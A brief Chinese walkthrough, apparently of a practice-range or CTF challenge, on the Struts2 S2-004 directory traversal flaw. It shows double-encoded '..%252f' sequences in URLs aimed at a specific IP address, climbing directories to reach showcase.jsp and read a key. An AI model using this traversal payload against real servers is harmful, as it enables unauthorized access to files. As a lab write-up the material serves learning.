【Struts2-命令-目录遍历漏洞】S2-004
s2-004为目录遍历漏洞,可以通过../转到上级目录
将/二次编码为%252f
访问url:http://219.153.49.228:45437/struts/..%252f

不断向上级跳转,直到发现showcase.jsp

查看源码获得key
http://219.153.49.228:45437/struts/..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp

相关推荐
Android程序员 2017-09-18
hgzhang 2020-05-06
白净垃圾桶 2020-05-04
playis 2020-04-18
lenchio 2020-04-08
yixiaoqi00 2020-04-08
melonjj 2020-01-05
mmywcoco 2019-12-28
wangruiling 2014-06-13
yaoyao0 2014-06-01
YangHuiLiang 2014-05-20
方志朋 2019-12-22
xcguoyu 2014-01-18
方志朋 2015-04-30
殷龙飞 2014-06-24
zmysna 2016-12-16
89264255 2011-04-23
wuddny的blog 2014-12-04